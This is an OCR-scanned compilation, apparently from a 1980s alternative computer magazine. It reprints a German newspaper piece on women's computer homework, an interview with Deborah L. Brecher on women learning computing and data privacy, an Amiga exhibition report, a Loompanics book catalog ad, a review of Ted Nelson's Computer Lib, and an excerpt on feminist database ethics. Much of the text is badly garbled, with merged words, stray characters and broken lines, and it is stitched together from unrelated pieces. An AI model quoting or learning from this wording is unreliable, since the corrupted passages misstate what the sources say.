arbeit zwangsläufig mehr mit ih¬
ren häuslichen Lieben zu tun
haben.
Die große Zufriedenheit der
Computerheimarbeiterinnen
kommt daher, daß der Computer
als eine Herausforderung begrif¬
fen wird, die Computerheimar¬
beit als eine herausfordernde Tä¬
tigkeit, deren Erfüllung Selbstbe¬
wußtsein hervorruft. Die Frauen
kommen aus traditionellen Büro-
und Angestelltenbereichen, und
die Heimarbeit kann „als Protest
der Frauen gegen die hierarchi¬
schen Strukturen der Betriebe in¬
terpretiert werden“ (DJI). 63 Pro¬
zent der Frauen waren vorher
erwerbstätig, 25 Prozent waren
arbeitslos, und-13 Prozent waren
Hausfrauen. Frauen seien mit der
Büroorganisationund Computern
bestens vertraut, wogegen Mana¬
gern eher eine Computerangst
nachgesagt wird. Wegen dem ho¬
hen „Potential weiblicherKompe-
tenzen“ sollten Frauen danach
trachten, höherQualifizierteCom-
putertätigkeiten auszuüben. Bei¬
spielsweise die Beratung von Fir¬
men, die neue Computersysteme ■,
einführen wollen oder die Bera- |
tung bei Softwareveränderungen
für spezielle Systeme »Tätigkeiten
und Funktionen.
Diese Arbeiten, die als höher¬
qualifiziert gelten, und die unter
Umständen ziemlich viel Geld
einbringen, werden zur Zeit
hauptsächlich von Männern ge¬
macht, So fängt auch der Ver¬
dienst der Männer genau an der
Grenze an, wo der zur Zeit für
Frauen aufhört. Frauen geben an,
bis zu 2.000 Mark bei Vollzeit zu
verdienen, Männer machen esj
nicht darunter, eher aber weit dar¬
über,nämlichbiszu 10.000Mark.
DabeikönntederComputerden
Frauen weit mehr bieten. Steht er
einmal in der Wohnung, fordert er
geradezu heraus, sich mit ihm zu
beschäftigen. Austüfteln, Aus-
ptobieren. Lernen. Die Möglich¬
keiten , sich weiterzuqualifizieren
ohne Ausbildungsnachweise und
Zertifikate, sind in dieser „Nische
auf dem Arbeitsmarkt“ noch ge¬
geben.
Höherqualifizieren?
Frauen haben einen weiblichen |
Lemstil, behauptet die AulPDA
desersten Frauencomputer-Lehr- '
buchs Deborah L. Brecher (siehe
auch Interview). Frauen lernen
eherganzheitlich, wieetwasfunk-
tioniertundwarum. DerMannda-
■ gegen drückt auf die Tasten und
wartet was passiert. Während
! Frauen das Ganze verstehen wol-
■ len, reicht es Männern, erst mal
' auszuprobieren, und nach und
■ nachzuverstehenoderauchnicht.
- Grund ist die Regelorientiertheit
^ der Jungenspiele (Handball) im
Gegensatz zu den Mädchenspie-
r len, die prozessorientiert seien.
Außerdem fehlt Frauen im allge-
r YneinendicErfahrungmit&hemn-
- Zeichnungen. Sie haben in ihrer
•- ViMheit nie Flugzeugmodellezu-
i- sammenbauen müssen. In Sachen
J- Chaosproduktion sind Frauen.
n aufgrund ihrer Verantwortlich-
>- keit im häuslichen Bereich auch
id vorsichtiger. Deswegen experi-
st mentieren sie vorsichtiger. Die
i- sprichwörtliche Zaghaftigkeit
1- vonFrauenhatalsoeinensehrklu-
3- gen Hintergrund.
5r
;n Im Lehrbuch von Brecher ist
:n das alles berücksichtigt. Fachaus-
er drücke werden erklärt. Sie nimmt
m Analogien und Beispiele aus dem
a- Umkreis der weiblichen Erfah-
;st rungen (z.B. vergleicht sie man-
0 - ches mit dem Backen, was einem
e- vielleicht etwas komisch vor-
ch kommt, aber es sogleich auch ver-
n- ständlicher macht).
Ziel istdie Auflösung von Tech- müssen.
nophobiehinzurmutigenQualifi- t
kation. Denn wer bestimmt heute
dieBeschäftigungspolitikimtech-
nischen Bereich? Wer bestimmt,
wie und welche Computer einge¬
setzt werden? Und wer hat dann ,
die Last mit der Anwendung? Die
Propaganda kommt einem ein biß- i
eben naiv vor, wenn man bedenkt, 1
wie hoch das Interesse gerade an
niedrigen Arbeiten am Computer ‘
ist. Bei einerUmverteilung der ge-
schlechtsspezifischen Computer¬
arbeit, müßten die Männer man¬
gels besserer Angebote eben auch
„niedere“ Arbeiten venichten. Es
wäre sowieso besser, wenn sie es
täten, dennsiewerdenbekanntlich
1 nicht schwanger. In Kalifornien
hat man festgestellt, daß Frauen,
die mehr als 20 Stunden i n der W o-
che am Bildschirm arbeiten, dop¬
pelt so oft Fehlgeburten haben wie
andere Frauen. Ein Gespräch: A.
meint, Kinder an Computern vriir-
den kein prozessuales Denken
mehr lernen, keine Zufalle beim
Spiel, cs würde im Grunde eine
Verarmung stattfinden, das Pro¬
zeßhafte imLcbenund imspieleri¬
schen Erfahren des Lebens völlig
I verschwinden. Aber die Kinder,
die Computer spielen, gucken sel-
t tener Glotze, halte ich dagegen.
1 Sie probieren, sie spielen Abcn-
teuerspiele, in denen sie die
Hauptrollehaben, siekämpfenge-
, gen eine „objektive Macht“, den
. I Computer, an, schluBendlich ge-
j winnt der, aber sie haben den Er-
’ folg des Absurden. DerComputer
1 stelltihnenAufgaben,diesielösen
Durch den Computer werden
sie herausgefordert, und sie wis¬
sen, daß es eine Maschine ist.
Einsame Kinder, was hätten sic
sonst heuuutage. Ich hatte Steck-
bausteine,da versuchte ich, Kauf¬
läden und Puppenstuben draus zu
basteln. Es ist mir nie gelungen,
und hat in mir die tiefe Überzeu¬
gung himerlassen, daß, je mehr
ich mich anstrenge, etwas zu lej.
sten, umso weniger dabei heraus¬
kommt , undeben Aufgebautes im¬
mer wieder zusammcnkracht.
Nicht so das Computerkind. Zu¬
nächst tut der Computer immer
das, was man sagt. Er mt auch d^
was man will, vorausgesetzt, be¬
stimmte Regeln werden eingehal¬
ten. Beim Steckbaukasten ist die
Zerstörungsgefahr viel größer
Obwohl man strikt die Regeln ein¬
hält (die Steine ineinandersteckt)
ist noch längst nicht gesagt, daß
das dabei herauskommt, was man
sich vorgenommen hat. Beim
Computer geht’s, oder es geht
nicht,undwennesnichtgeht, iste^
nicht so schlimm, weil es ja eine
Maschine ist. Ein Ding, von dem
man immer wußte, daß man ihm
eigenüich nicht gewachsen ist
Die Bausteine dagegen sind viel
verletzlicher, roher, man ist viel
zu sehr mit ihnen identifiziert
Dieses Männerspielzeug, des
sen einziges Geheimnis ein’„Ge'
1 him“ ist, das zusammenz^e'
und vergleichen kann, das sich dä
monisch aufblähen läßt, weil '
mitihmDingetunkann.’diema^
! der Geschwindigkeit n^Ss
N T E R V I E W
Ein Computerbuch für einen weiblichen Lernstil
Deborah L Brecher, Autorin von „GO STOP RUN“ plädiert für das Verständnis der Technologlesprache
taz: Ein Computerbuch flir einen weiblichen Lem-
stil. Wendest Du mit dem Schlagwortder „Ganzheü-
Uchkeit“ beim Lemennicld ein Defizit von Frauen in
einPositivumum?
Deborah L. Brecher: Ich denke nicht,daßeseinDe-
fizit ist. ZumBeispiel müssen alle Kinderdas Schrei¬
ben mit der rechten Hand erlernen, selbst wenn sie
linkshändig sind, was nicht gut für sie ist. Ich denke,
das ist dasselbe. Frauen werden gerade im techni¬
schen Bereich mit einem Lemstil, näml ichdemnach
Regeln konfrontiert, der nicht der ihre ist, und wen¬
den sich deshalb von der Materie ab.
Die negativen Auswirkungen des Computerein¬
satzes auf Frauenarbeitsplätzen sind bekannt. Wo
siehst Du die Chancen für Frauen ?
Für mich ist die große Frage, wie die Technologie
umgesetzt wird. Eigentlich sollten Computer die
Wirkung haben, daß die Arbeit erleichtert wird. So
ist es aber gewöhnlich nicht. Das heißt für mich, daß
die Anwendung von Computern falsch ist. Es liegt
nicht an der Technologie selbst, sondern daran, wie
sie umgesetzt wird. Z.B. wenn wir Technologie
richtig benutzen würden, da würde es dann irgend¬
wann keine „Tippsen“ mehr geben. Irgendwann
müßte die Trennung der Arbeitsberichte, daß die
eine tippt, was die andere sich ausgedacht hat, aufge¬
hoben werden. Diese Trennung ist absurd, zumal
jetzt schon kleine Jungen am Computer tippen ler¬
nen. Dieser Teil der Arbeit muß rückintegriert wer¬
den in dieganze Arbeit von schriftlicher Produktion,
wodurch sich für Frauen andere, interessantere Tä¬
tigkeiten erschließen könnten, als das Tippen von
Gedanken anderer.
Die Amerikaner haben sich in Schweden umge-
gucktundgesehen,daßsiedortbessereAutosprodu-
zieren, weil die Leute dort in Teams arbeiten und das
Endprodukt, was sie selber hergestellt haben, als
Ganzes sehen. Die Amerikaner haben einerseits da¬
von gelernt, andererseits stellen sie jetzt Computer
in die Büros, wobei eine Frau den ersten Entwurf
tippt, eineanderedie Korrekturen macht etc., sodaß
sie nie ein Endprodukt sehen und sagen können; das
habe ich fertiggestellt.
Du hältst es für wichtig, daß sich mehr Frauen als
'■bisher mit der Computertechnologie beschäftigen,
weil „das neue elektronische Zeitalterauch die weib¬
liche Sensibilität reflektieren muß“. Kannst Du
Deine Vorstellung von weiblicher Einmischung und
deren Folgen etwas verdeutlichen ?
Die eine Frage ist die der femininen Sensibilität
und die andere ist für viele Frauen einfach die Frage:
Wie kriege ich einen J ob? In den US A ist es schon so,
daß du ohne Computerkenntnisse aus dem Rennen
bist. Da gibt es zwei Gruppen. Kannst du mit dem
Computer arbeiten, stehen dir die Türen offen,
kannst du es nicht, gibt es flir dich die niedrigen ma¬
nuellen Arbeiten. Für viele Frauen ist es sehr wich¬
tig, die Wahl zu haben, einen einigermaßen guten
Job zu bekommen. Zum anderen Teil der Frage. Da
gibt es eine bestimmte Art von Leuten, die keine an¬
deren Beziehungen in ihrem Leben außer der zu ih¬
rem Computer haben. Ich nenne sie Nurds, und ich
habe noch nie einen weiblichen Nurd getroffen. Ich
denke, daß Frauendem realen Leben mehr verhaftet
sind, und das rührtdaher, daß Frauen, Mütter, Töch¬
ter, Schwestern sind. In den USA ist das Verhältnis
der Töchter zu den Eltern anders als das des Sohnes
zu ihnen. F rauen kümmern sich mehr um ihre Bezie¬
hungen. Es gibt auch Männer, die sich .unterstüt¬
zend, um Leben bemüht, verhalten, aber das sind
dann meist „softmen“, die auch nicht viel mit Tech¬
nologiezutunhabenwollen. Natürlichsindnichtalle
Männer in der Computerbranche Nurds. Aber es ist
bemerkenswert, daß man keine Frau findet, die sich
total abkoppelt und als Primärbeziehung den Com¬
puterhat. Ich bin froh, wenn mehr Frauen und diese
andere Sorte Männer in diese Industrie gehen, und
umgekehrt habe ich Angst bei der Vorstellung, daß
all die Technologie von Leuten geschaffen und ein¬
gesetzt wird, die Maschinen so sehr lieben.
Du schreibst, daß Du eine „feministische Auffas-
sungvon Technik“vertrittst. WasheißtdasfiirDich,
und wie könnte die sich in der Computertechnologie
niederschlagen?
Wenn du ein System entwirfst, ob es sich nun um
Computer oder eine andere Technologie handelt, ist
es wichtig, nicht nur ein Einzelteil zu sehen, sondern
sich das ganze System erst vorzustellen. Es wird im¬
mer nur geguckt, welche Aufgabe der Computer er¬
füllen soll, und nicht auf die Person geachtet, die mit
ihm arbeitet. Ein weiterer Aspekt feministischen
Denkens ist, daß die Beziehung der Person zum Sy¬
stem miteinbezogen wird. Ein System sollte so ent¬
worfen sein, daß es einfach ist, es dahingehend zu
verändern, daß es der Person dient und nicht umge¬
kehrt.
Du sprichst jetzt von der Person und dem Compu¬
ter. Es betrifftja noch ein paarandereLeuie. Du ver¬
weist in Deinem Buch auf die Gefahr der Orwell-
schen „Big-Brother-Gesellschaft“: MitderEinmi-
schungvon Frauen wäreesein Geschwisterpärchen,
das uns überwacht. Ist Dir bei diesem Gedanken be¬
haglicher, oderhälstDu Frauen persefür die besse¬
ren Menschen, die die Realisierung dieser Horrorvi¬
sion verunmöglichen ?
Oh nein, ich unterteile Leute nicht in sch warz und
weiß, gut und schlecht. Wenn ich vonden Benutzern
des Systems spreche, meine ich das ganze Gebilde,
d .h. ein System, das Informationen über Leute spei¬
chert und die gespeicherten Leute selbst sind beide
Teil des Systems. Deshalb sollten die Rechte der
Menschen respektiert werden. Ein weiterer Aspekt
feministischer Technologie: Wenn du Informatio¬
nen über Leute sammelst, müssen deren Rechte re¬
spektiert werden. Ich denke, es sollte Gesetz sein,
daß, wenn jemand über mich Informationen sam¬
melt, solltediesePersonmireineMitteilungmachen
und eine Kopie der Informationen zusenden müssen.
Ich sollte das Recht haben, sie zu kennen und zu än¬
dern. Und ich sollte das Recht haben, zu sagen: Ich
will nicht in Deinem Computer sein.
Ist es nicht ein bißchen blauäugig, an den Daten¬
schutzzuappellieren, ohneechteKontrollmechanis-
menzuhtdzen?
Ich denke, daß es definitiv ein Gesetz geben
müßte. Es gibt bestimmte Gesetze in den USA. Die
Gesetze hinken der technologischen Entwicklung
hinterher, aber das ist eine andere Sache. Der andere
Teil feministischenTechnologiedenkens ist der, daß
es unmöglich ist, eine Maschine zu bauen, die nicht
kaputt geht. Das heißt man hat die Konsequenzen ei¬
nes Sy stemzusammenbruchszu beachten. Wenn das
beachtet würde, wäre nicht ein Nuklearreaktor 60
Kilometer entfernt von Manhattan gebaut worden,
wo an einem normalen Arbeitstag 20 Millionen
Menschensind. Das isttypischNurd, etwas ohnehin
problematisches zu machen, und es dann auch noch
downtown aufzubauen. Das ist ein Denken, das
Menschen nicht einbezieht. Desgleichen gibt es be¬
stimmte Datenbanken, dienichteingerichtet werden
sollten, bestimmte Informationen, die nicht im Ver¬
bund sein sollten, weil das System definitiv kaputt¬
gehen wird, d.h. jemand bekommt Informationen,
die er nicht haben sollte. Wenn alle Systeme irgend¬
wann zusammenbrechen, ist es angebracht zu über¬
legen: Kann ich das Risikoeingehen, das sich aus den
Konsequenzen ergibt? Du planst den Zusammen¬
bruch in deinen Entwurf ein, und ich bin sicher, daß
einige Informationssysteme zwar möglich sind,
aber nicht gebaut werden sollten.(...)
Deswegen habe ich das Buch geschrieben, mit
dem Gedanken, daß wir die Technologensprache
besser verstehen. Wir alle sollten diese Sprache ler¬
nen, um politisch wirksam arbeiten zu können.
Das Interviewföhrte Christine Engel
Deborah L. Brecher Foio:taz-Archiv
selbst machen könnte, ist letztlich
nur ein Verrichter verschiedener
Tätigkeiten.
Anriga
Vor ein paar Woehen war ich auf
einer Computerausstellung in
Berlin. Da ieh keine Ahnung von
Computemhabe, wußte ich nicht,
um was es sich bei dieser Ausstel¬
lung handelte.
Die fremde Welt teilte sich
schon beim Eintritt mit. Geht man
auf eine Ausstellung und sagt, daß
man keine Ahnung hat? Die Jup-
pies an der Kasse sind freundlich.
Schließlich bin ich eine Frau, mir
wird zugestanden, keine Ahnung
zu haben. Eine andereorganisato-
rische Mitarbeiterin dort hat auch
keine Ahnung, sie hat aber auch
keine Zeit, mich herumzuführen.
Wir befinden uns in den „Festsä¬
len“ im Berliner Arbeitemertel
Neukölln. Hier werden sonst Po-
litveranstaltungen von den Kom¬
munisten gemacht. Der Festsaal
sieht ziemlich heruntergekom¬
men aus, ocker-schäbig mit gel¬
bem Lichtund armen Leuten. Hier
also das Neueste und Wunderbar¬
ste, was es angeblich auf dem
Computer-Markt gibt, „Amiga“
(die Freundin) heißt die Wunder¬
maschine. Ist es Absicht oder Zu¬
fall , daß die glänzende teure Welt
der Computerästhetik mit ihren
vielen Informationsmappen mit
kleinen Geschenken, die genauso
glänzen, und dem ganzen eier-
schalfarbenen Gerät hier über¬
haupt nicht zur Geltung kommt?
Eine freundliche Dame von der
veranstaltenden Firma Technic-
Support in Berlin, versucht mirein
paarDinezu erklären. Mindestens
dreihundert Leute stehen neugie¬
rig gebeugt vor den Geräten. Män¬
ner, Väter und Söhne, mit merk¬
würdig symbiotischem Gesichts¬
ausdruck. Und die meisten haben
ausgebeulte Hosen und unter Ga¬
rantie keine vollen Portemonaies.
Das Neue und Bahnbrechende an
„Amiga“, er (sie?) ist seit rund
zwei Jahren auf demMarkt, istdie
Möglichkeit Textund Büd per Vi¬
deokamera miteinander zu vermi¬
schen und das mit einem er¬
schwinglichen Computer. Man
hat eine „Maus“ in der Hand und
malt direkt auf den Computer.
Mich als Laien, beeindruckt das
gar nicht so sehr, weil ich sowieso
davon ausgehe, daß man mit Com¬
putern alles möglich machen
kann. „Amiga“ gebe Einblick in
eine ganz neue „Computerphilo¬
sophie“. Lobend wird hervorge¬
hoben, daß man mit „aufgerüste¬
tem“ Amiga ganze Bilder zerstük-
keln, und wieder neu zusammeh-
setzen kan n. Bunt! Man zeichnet
nicht mehr, sondern man nimmt
einen kleiiwn Ausschnitt auf den
Monitor, macht ihn groß und
drückt ihn irgendwo drauf, so daß
lauter kleine Kästchen in blau', in
verschiedenen Blaus, mal eine
Reihe so, mal eine Reihe so, mal
bißchen weiß, noch drei Kästchen
hoch und wieder zu rück, und zwei
halbe rosa Kästchen, zum Rand
hin dunkler rosa, ich komme gar
nicht so schnell mit, und fertig ist
das blaue Auge. „Amiga“ ist et¬
was fürs Grafikgewerbe. Mit
Amiga kann man Filme machen,
Trickfilme. Mit zitternden Hän¬
den, weichen Knien blättere ich
die ganzen Geschenke noch im
Auto durch, Werbegeschenke,
weiß ich ja. Trotzdem eine Com¬
puterzeitung, ein Buch zur Soft¬
ware. Unverständlich -r nicht
kompatibel — außer einer gewis¬
sen „Umrüstung“.
Ein Computer wie der oben be¬
schriebene fördert den Perfektio¬
nismus und den Größenwahn.
Man kann alles kaputt machen,
verändern und wieder ganz ma¬
chen. Die Realität nach eigenem
Gutdünken verändern, das lockt
Allmachtsgefühle hervor, ist
schädlich für labile Menschen.
Nicht alle sind labil, und warum
sollen nicht auch Frauen ihre All-
machtphantasien an einer Ma¬
schine wiedieserüben? Gleichheit
für Allmacht!
Zum Schluß noch ein Zusam¬
menhang: „Es gibt in der Natur
keine isollierten Bausteine, wie es
nochNewtondachte,sonbdemdie
Natur ist ein kompliziertes Netz¬
werk von Zusaimnenhängen zwi¬
schen verschiedenen Strukturen,
die ein Ganzes bilden“, sagt Frit¬
jof Capra , und das eher moralische
Ganzheitsbemühen der New Age-
Bewegung mitderstarken Abkehr
von richtig oder falsch trifft haar¬
genau auf die Brutalität und Zer¬
stückelungsfähigkeiten der Com¬
puterlogik.-
Mil freundlicher Genehmigung der "taz” entnommen
—
Loompanics'
Giealesl
Hits
RttUles fr Features
(eom
Ulli; »lüS'r
BOOK CATALOG
IX Tllli; WOKLI)
—-
.
LOOMPANICS- GREATEST HITS
The Collected Articles, Interviews and Features
from
The Best Book Catalog in the World
Heresy, Contra-Orthoöoxy, Survival, Self-Reliance t ifo
Extension, Privacy, TaxAvoision. ... The Loompanics Unli’mUBrt
Book Catalog has iong beenan indispensible Information so
for independent-living, independent-thinking people LibarVt
Yourselt First! is the Loompanics philosophy - a self-reliarit vi«w
often expanded upon in the articles, Interviews and features t
we provide between the pages and pages of self-reliance
that tili our Main Catalog. oooks
Many of our customers have inquired about the availabilitv r.«
these articles and features, run in past editions ot The Beel J
Catalog In the World and its Supplements. Now we hnu
collected ALL of these thought-provoking features into on« Ki
book! ”
What kind of material Can you find in this compendium of
counter-culture cogitation? Just get a load of this: ^
Interviews:
Barry Reid on Fake ID * Brad Steiner on Seif Defense *
Michael Kuzma on Mail Drops * Kurt Saxon on Sur^^v^
* Carl Dorski on Crime * R.W. Bradford on Financia
Privacy vr Eddie the Wire on Locks *M. Harry ön
nvestigative Reporting * Michael Marotta on Codes w a
Black MaTke^^’^'
Articles;
Personal Strategies for Liberty ★ Finding a Mate * Death &
Taxes. Gordon Kahl and the IBS ★ Using Money Orders to
Protect Your Financial Privacy ★Gun Control as Class
Mh h'® * National Defensl *
Libertanan Warfare for Fun & Profit ★ m Praisl of
Vengeanpe * The Reasons Behind Abundance & Scarci^
RevoTuhona^ WaT 'ndependence and th^
Features;
Squalting on Public Land + Situationist Comics * Findinn
Morer^'^^ *Aphorisms of a Pessimist * And
The articles, Interviews and features are arranaeri hv to ■
the following sections; * Breaking Free * Taxes * Phvacv w'S
Defense ♦ War & Survival * Crime and Punishment *
Features. All m all, an amazing collection of Creative
fjracfical advice, and just plain fun! '«eas,
Some of the most provocative and outrageous artioio
ideas of recent years! En/oy! “Ueous articles and
Large 8% X 11, 80 pp, aoflcover
LOOMPANICS’ GREATEST HITS
Computer Lib/Dream Machines
i'lWOFi
Computer Lib/Dream Machines
Ted Nelson started the entire genre of mainstream Com¬
puter books in 19/4 with a Whola Earth Cafalog-sized
polemic calied Computer Lib/Dream Machines. Like
an Ac'e pulp Science-fiction novel, it came in two halves,
bound upside-down together. The "Lib" side was ä tourist
guide to available Computers and the corporate politics
behind them; the "Dream" side showed us evanescent
innovations that (Nelson knew) would reshape everyone's
lives. (One of these nascent innovations was "Hyper-
text" — in which text or pictures contain "links," or
passages tbrough which people con melaphorically leap
to other information important to them. Nelson is the
most prominent popularizer of tbis idea, which he has
devoted much of his working life to developing, and
which is now itself linked with various suddenly promi¬
nent programs like HyperCard and the forthcoming
Lotus Agenda.)
Now Nelson has voraciously updated both halves of his
old book. The formal is (abit too much) old stuff updated
copiously with brilllant new stuff. Amidst viciously well-
targeted assessments af machines, metaphors, and man-
ufacturers, you will he guided through hacker in-jokes
and skilIed pithy Judgements. Nelson is sometimes justly
criticized for quirkiness and self-indulgence; but he has
an innate ability to judge the significance of particular
technologies, shared by few other writers. He has, in this
edition, also recreated what was then and is still the
most fun-to-read Computer book of all time.
—Art Kleiner
Thepmblem
isiiot
Software
“f«encf//ness."
conceptual
clarity;/)
globedoes
notsay.
“good
morning.“ ft
is simple
and clear
not
‘friendly."
rrsALL
COMPUTERS
Somewhere
Inside almost
every object,
these days, is
a IlWe Pro¬
fessor.
Elevators,
dank ma¬
chines, gas
pumps, the
jammed cash
register that
Just happens
to be hotding
up vour
llne—all
have pecu-
llaritles
hased on
howsome
programmer
thought
aboot the
Problem.
Compurer Lib/
Dream Machines
Ted Nelson
1987; 330 pp.
$18.95
($20.95 postpaid) from:
Microsoft Press
Attn.; Consumer Sales
16011 36thWay/Box 97017
Redmond, WA 98073-9717
800/426-9400
or Whole Earth Access
——
Release 1.0
The most literale and informed writ-
ing on the technology of thinking
comes on the groy, typewritten pages
of this very expansive newsletter. For
many ofits subscribers, il's an unbe-
lievabte bargain. Inslead of tramping
to the Computer industry's most tan-
talizing Conferences, they can read
Esther Dyson's personable reports,
and soak up more than they would
by being Ihere. Dyson deciphers
esoteric lechnical issues into oh-l-
get-itl language, further refined by
an impenetrable filier against PR
hype. Moreover, she has an unerring
nose for the significant consequence.
Talk a library into subscribing.
—Kevin Kelly
My favorite Computer read is Re¬
lease 1.0, a pricey monthly from
NON-Ö>nfV]t€(l
Yl€J^) Of W Vlo(i.L>
tWi,
The ALL-PURPOSE Machine
Computers are COMPLETELY GENERAL, with no fixed
purpose or style of Operation. In spite of this, the stränge
myth has evolved that Computers ore somehow "moth-
ematical."
Actually von Neumann, who got the general ideo about
OS soon OS onybody (1940s), calied the Computer
THE ALL-PURPOSE MACHINE,
(Indeed, the first backer of Computers öfter World War II
was o moker of multi-lightbulb signs. It is an interesting
possibility that if he hod not been kilied in an oirplone
crosh, Computers would hove been seen first os text-
handling and picture-taking machines, and only later
developed for mathematics and business.)
We would call it the All-Purpose Machine here, except
that. for historical reasons it has been slapped with the
other name.
But that doesn't mean it has a fixed way of operating.
On the contrary.
COMPUTERS HAVE NO NATURE AND NO CHARAaER,
save that which has been put into them by whoever is
creating the program for o particular purpose. Com¬
puters ore, unlike any other piece of equipment, perfectly
BLANK. And that is how we have projected on it so
many different faces.
TV.
My Position on television is that television is
movies that follow a slotted schedule . The
time-slat decrees the nature of television just
as surely as the time slot decrees the nature of
schooling in our current System.
PUBLIC REPOSITORY SYSTEM
WITH PLURALISTIC RE-USE,
publlcxtioa by users
PRiyXTt PUBLIC
DOCUMDTTS documdits
PUBLIC PPIVATt
UNKS UKCS
UNIFIEO TISSIIEOFSTOXACE. EYES-EIPANDlWa
Cmu.» OlrreHEHT STORAOE STATIOB
From uisraryMactiines 87 . 1 .
EINE DATENBANK - ETHIK
EIN POSITIVES
FEMINISTISCHES MODELL
Gravierende Probleme ergeben sich aus Datenbankanwendungen wie
Auskunfteien. Es gibt bereits Unternehmen, die gegen Bezahlung ein
Dossier zu Ihrer Person anlegen. Uber ihre an ein Modem ane^^hlosse-
nen Computer durchsuchen sie zahlreiche offenüich zugängliche Dat
banken. In den Volkszählungsunlerlagen sind Angaben über das du
schnittliche Jahreseinkommen enthalten. Die f’
Grundbucheintragungen und andere harmlos anmutende
können Rückschlüsse auf Ihre Kreditwürdigkeit zulassen. Es kann also
ein umfassendes Bild von Ihrer Person erstellt werden.
Ein beängstigender und wenig beachteter Eingriff in Pnyatsphare
ist dadurch gegeben, daß viele Vereine, Unternehmen und Ze^^^^nften
ihre AdressListen ohne die Erlaubnis ihrer Mitglieder Abonnenten
oder Kunden verkaufen. Auskunfteien und sogar Behörden ^
Listen erwerben. Welche Zeitschriften Sie lesen, sagt sehr viel über Ihr
politische Gesinnung aus. Auch Geschäfte, in denen Sie einkaufen as-
^n Rückschlüsse auf Ihre Lebenshaltung zu. Das Ernannt m den USA
kommt mit Hilfe dieses Verfahrens Personen auf die Schliche, die keine
Steuern zahlen (Für Personen, die ihr Einkommen anseton
wurde diese Methode bisher noch mcht verwendet). Es wjden Adre
senlisten von eleganten und teuren Zeitschriften gekauft. Mit Hi fe von
Computern werden daraufhin die Namen überprüft um festzustellen ob
die angeblich wohlhabenden Abonnenten auch Emkommensteuererkla-
^oir.Bi'g^ Brother«-Gesellschaft Orwells ist auf unbehagliche Weise
näher gerückt. Es gibt leider keine Gesetze, die den Handel mit Infor¬
mationen regeln. In einigen Branchen, etwa
glücklicherweise Regelungen. Im
maüonen kaufen und verkaufen. Es gibt zwar in den USA den Fre^orn
of Information Act, der den Bürgern jedoch nur das Recht emraumt zu
erfahren, welche Informauonen eine Behörde über sie gespeichen ha .
Es wird hingegen keineswegs geregelt, welche Informaüonen ein Pnva -
unternehmen oder eine Behörde über eine Einzelperson speichen, oder
irgendwelche Schreckensgeschichien berichte, die
ihm im Zusammenhang mit gespeicherten Informationen wide^ren
sind. Falsche Daten, die sich in eine Datei eingeschlichen haben, können
Sie regelrecht verfolgen. Es kann passieren, daß Sie für kreditunwur-
dig erUärt werden, die Überweisung einer Kaufhausrechnung verspätet
ankommt oder Sie einen bereits bezahlten Strafzettel noch emm^ zahl n
sollen. Aufgrund der sich aus falschen Informationen ergebenden Pro¬
bleme unterliegen die Banken gesetzlichen Regelungen.^ In tot allen
Staaten der USA sind Sie befugt, jederzeit Einsicht in die über Sie ange¬
legte Bankakte zu nehmen. Wenn Ihnen ein Kredit verweigert wurde,
muß Ihnen die Bank kostenlos eine Kopie Ihrer Akte zustellen; ansonsten
müssen Sie hierfür bezahlen. Aber was ist mit all den anderen Akten,
die über Sie angelegt wurden?
eben hat. In diesem Fall würden nur wenige von ihrem Recht Gebrauch
machen und Fehler in den Dateien sowie falsche Informationen meistens
unentdeckt bleiben (wie würde man überhaupt von der Existenz der ge¬
speicherten Daten erfahren?).
Eine Datenbank-Ethik —
ein positives (feministisches) Modell
Nachdem ich Sie vor den schlimmsten Folgen des Mißbrauchs von
Computer-Datenbanken gewarnt habe, möchte ich eine interessante
Möglichkeit aufzeigen, wie eine Datenbank unter Einbeziehung mora¬
lischer Gesichtspunkte konzipiert sein kann.
Die Einrichtung von Datennetzen gehört zu den positiven neuen Mög¬
lichkeiten. die sich durch die Nutzung von Datenbanken ergeben. 1981
machte ich eine interessante Beobachtung, ln den USA gab es zahlreiche
Fraueninitiativen, die daran gescheitert waren, daß zu wenig Leute von
ihrer Existenz wußten. Ihre Aktivitäten waren dringend notwendig; sie
umfaßten die Bereiche Frauenhäuser, Krisenintervention bei Vergewal¬
tigungen, Rechtshilfe für besondere Frauengruppen, zum Beispiel Ge¬
schäftsfrauen, alte Frauen und Frauen aus Minderheiten; ferner auch
Beiträge zur Frauenkulmr, wie Kleinverlage für Frauenbücher und Pro¬
duktion von Kunst, Musik, Theater und Film von Frauen. Leider fehlte
selbst den erfolgreichsten Initiativen das Geld, um sich in der Presse oder
im Radio, ganz zu schweigen vom Fernsehen, Werbung leisten zu kön¬
nen. Daher blieben ihre Aktivitäten den Frauen, die sie ansprechen woll¬
ten, weitgehend unbekannt. Andererseits hatten Frauen, die Kontakt zu
diesen Initiativen suchten, keine Möglichkeit, sie zu finden.
Als Unterstützung für diese Gruppen richtete ich unter dem Namen
The National Women ’s Mailing List (Landesweites Anschriftenverzeich¬
nis für Frauen) eine elektronische Datenbank ein. Dieses vemetzbare
Anschriftenverzeichnis sollte als Beispiel für eine elektronische Daten-
baiüc dienen, in der Informationen über Personen nach feministischen
(moralischen) Prinzipien gespeichert sind.
Ich bezeichne diese Prinzipien nicht deswegen als feministisch, weil
sie auf Frauen beschränkt sind, sondern weil sie am eindringlichsten von
Frauen artikuliert wurden, die sich als Feministinnen mit diesem Thema
auseinandergesetzi hatten (zum Beispiel Judy Smith vom Hb/rien and
Appropriate Technology Network und Corky Bush von der American
Association of University Women. Im einzelnen handelt es sich um fol¬
gende Prinzipien;
• Anerkennung der Rechte der Einzelnen
• Die Beteiligten haben die Kontrolle über das System
• Die Anwender sind an der Gestaltung des Systems beteiligt
• Im voraus erkennen, was die Folgen eines Systemausfells sind.
Und dieser Ausfall kommt unvermeidlich\
Ein bescheidener Vorschlag
Ich persönlich plädiere für die Auflage, daß jedes Unternehmen und jede
Behörde, die Daten über Sie gespeichert hat, Ihnen jedes Jahr eine Kopie
derselben zuschicken muß. Die Daten befinden sich bereits un Computer
und können daher ohne großen Aufwand ausgedruckt und toen zur Ver¬
fügung gestellt werden. Bei Banken ist dies bereits üblich, fe «gdma-
ßigen ALtänden erhalten Sie Kontoauszüge, so daß Sie die Korrektheit
der Bankabrechnungen nachprüfen können. Warum sollte ein nra -
unternehmen, das sein Geld mit Informationen über Sie verdient, nicht
dasselbe tun? Die damit verbundenen Belastungen dürfen dlerdings
S den einzelnen Personen aufgebürdet werden. Sie
eezwungen sein. Ihre Zeit und Mühe darauf zu verwenden, bei jedem^
Unternehmen Ihre Akte anzufordem, das Informationen u r legespei
Das Anschriftenverzeichnis für Frauen
Ich möchte anhand der National Women’s Mailing Ust erklären, was
